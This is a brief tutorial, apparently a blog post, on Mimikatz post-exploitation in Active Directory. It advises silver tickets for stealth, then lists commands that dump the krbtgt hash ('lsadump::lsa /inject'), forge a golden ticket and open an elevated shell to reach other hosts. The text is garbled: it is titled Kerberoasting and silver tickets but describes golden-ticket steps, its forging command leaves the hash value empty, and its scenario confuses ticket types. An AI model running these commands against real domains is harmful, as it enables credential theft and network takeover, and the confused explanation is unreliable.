Kerberoasting with Mimikatz

Mimikatz is a very popular and powerful post-exploitation tool most commonly used for dumping user credentials inside of an active directory network however well be using mimikatz in order to create a silver ticket.

A silver ticket can sometimes be better used in engagements rather than a golden ticket because it is a little more discreet. If stealth and staying undetected matter then a silver ticket is probably a better option than a golden ticket however the approach to creating one is the exact same. The key difference between the two tickets is that a silver ticket is limited to the service that is targeted whereas a golden ticket has access to any Kerberos service.

A specific use scenario for a silver ticket would be that you want to access the domain’s SQL server however your current compromised user does not have access to that server. You can find an accessible service account to get a foothold with by kerberoasting that service, you can then dump the service hash and then impersonate their TGT in order to request a service ticket for the SQL service from the KDC allowing you access to the domain’s SQL server.

Dumping the krbtgt hash

  1. Navigate to the Downloads folder where mimikatz is downloaded
  2. Run mimikatz in a command prompt
  3. Check the privilege: privilege::debug
  4. lsadump::lsa /inject /name:krbtgt — This will dump the hash as well as the security identifier needed to create the golden ticket
  5. This now gives us the NTLM hash, and the security identifier needed of the ticket granting ticket account

Creating the Golden Ticket

  1. Kerberos::golden /user:krbtgt /domain:controller /sid:<Enter SID of the output above> /krbtgt: /id:<use ID >
  2. We have our golden ticket!

Using the Golden Ticket

  1. misc::cmd
  2. We can now launch a command prompt with elevated privileges with our Golden ticket
  3. This will now allow us to access other machines on the network as well (sample command dir \\Desktop\c$)